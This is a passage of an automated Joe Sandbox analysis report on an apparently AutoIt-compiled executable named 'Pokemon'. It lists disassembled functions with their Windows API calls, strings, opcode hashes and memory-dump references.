                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                      • Opcode ID: 15f644079fef9879976d3016aee765826700c45e19f0e4068594142ef68eab4d
                                                                                                                                                                                                                                                                                      • Instruction ID: 4fbf514f6dc34f35a31ed2fe7b60d72d3fe8206c7b7152ca35a9d395e8b89965
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15f644079fef9879976d3016aee765826700c45e19f0e4068594142ef68eab4d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5201F775A41108ABCF14E790D922DFF33A8DF45B50F5001197912A7682DB249F0CE6B1
                                                                                                                                                                                                                                                                                      Function 000F25A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 000F2615
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                      • Opcode ID: 2d55b71affb59400c8bbe5ef404c65166e190454775370be666de9ade427ea34
                                                                                                                                                                                                                                                                                      • Instruction ID: fbdb10cecc726698333411ea5a7ec8ffae0885b5414a1bab2a7c949d384696c6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d55b71affb59400c8bbe5ef404c65166e190454775370be666de9ade427ea34
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0001A275A41108A6CF15E7A0D901EFF77A89B05750F500025B912E3682DB658F0CE6B1
                                                                                                                                                                                                                                                                                      Function 000F26B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 000F2720
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                      • Opcode ID: a1d32f5a4c09d9aeb785e7acaea6f19229daca1c7d5c5ef57f9e18c32160443e
                                                                                                                                                                                                                                                                                      • Instruction ID: bd05a1a2c310370ef00b707b9aabcd41676990ec1c4bcbe6d885b92d750145e5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1d32f5a4c09d9aeb785e7acaea6f19229daca1c7d5c5ef57f9e18c32160443e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AF0F475A41218A6CB14F3A49C51FFE73A8EF01760F400915B932A36C3DB60590CE6A0
                                                                                                                                                                                                                                                                                      Function 000F1461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000F146F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                      • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                      • Opcode ID: 4041e9cb52aa50df20ef6c822a5d040bcda64a036e8ea9f0d6a5b1aa87ba9ab3
                                                                                                                                                                                                                                                                                      • Instruction ID: 2d8b4fdfb8c4bffcb3a675c71149f17b4a0c40c45c0ae2e2c640f3c3f719b102
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4041e9cb52aa50df20ef6c822a5d040bcda64a036e8ea9f0d6a5b1aa87ba9ab3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABE048312887287BD6242798FC07FD576858F05B55F11481AF758695C34FE224A052DD
                                                                                                                                                                                                                                                                                      Function 000B10B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000B10E2,?,?,?,0009100A), ref: 000AFAD9
                                                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0009100A), ref: 000B10E6
                                                                                                                                                                                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0009100A), ref: 000B10F5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000B10F0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                      • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                      • Opcode ID: 58c0edace60c98487b20c84e5fbd249724caa35ce6e17f8de42daaa3d7fbdfa7
                                                                                                                                                                                                                                                                                      • Instruction ID: 928c78c4a1a60e8e98cf8c4338f32510bc3291e202159d4f1187cad333256c60
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58c0edace60c98487b20c84e5fbd249724caa35ce6e17f8de42daaa3d7fbdfa7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87E06D706007118FD331AF68E9183C2BBF4EB18301F008D2CE885C2A52DBB4D484CB91
                                                                                                                                                                                                                                                                                      Function 001039D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 001039F0
                                                                                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00103A05
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                      • String ID: aut
                                                                                                                                                                                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                      • Opcode ID: a431be4080c6e86c368e77008806e9b56bcfe267feb0d462b4e7758194878bcb
                                                                                                                                                                                                                                                                                      • Instruction ID: 8df32cd2a46de49b2eca01eb7c4e3cb77d5e988f50d4197b6b1a6254fadefafe
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a431be4080c6e86c368e77008806e9b56bcfe267feb0d462b4e7758194878bcb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0D05E72500328B7DA30A764EC0EFCB7A7CDB44711F0002A1BA65960D1DAF0DA8ACB90
                                                                                                                                                                                                                                                                                      Function 00122DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00122DC8
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00122DDB
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FF292: Sleep.KERNEL32 ref: 000FF30A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                      • Opcode ID: 68280a93179c32bba79ba43152b7d84a72bdfd812c8db0c7d7bae129a868544c
                                                                                                                                                                                                                                                                                      • Instruction ID: 7e4a41ebfa65eb647fc2d84b3b2c22a7b55fdb0cb9bf0fbee16e09a349806d1b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68280a93179c32bba79ba43152b7d84a72bdfd812c8db0c7d7bae129a868544c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5D02235384300B7F274B330FC0FFE63B209F00B00F1048207309AA8C0CAE06841C640
                                                                                                                                                                                                                                                                                      Function 00122DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00122E08
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000), ref: 00122E0F
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FF292: Sleep.KERNEL32 ref: 000FF30A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                      • Opcode ID: 4df71bace7be7613de8ac101403313266dd659c1f7f0d5dc986972ea75279cc0
                                                                                                                                                                                                                                                                                      • Instruction ID: ee700bbb7b488c538ea2b16514e4beb6e67e7efa48125716e33c1962b82d9ab6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4df71bace7be7613de8ac101403313266dd659c1f7f0d5dc986972ea75279cc0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAD0A931381300BAF274A330FC0FFE63A209B04B00F1048207305AA8C0CAE068418644
                                                                                                                                                                                                                                                                                      Function 000CC17D Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 000CC213
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000CC221
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000CC27C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b2858f9c355ed8cb818ecdf802ddc0340d93f9d006add0ecad3d5993632a5dde
                                                                                                                                                                                                                                                                                      • Instruction ID: de58bcdbc0e5c40c0711b639a4416d2030bb515b1dc3f6979fb324b4660c81a5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2858f9c355ed8cb818ecdf802ddc0340d93f9d006add0ecad3d5993632a5dde
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC41A431600606AFEB619FE5C844FBE7BE5AF51710F2441ADF85E9B2A1DB309D41CB60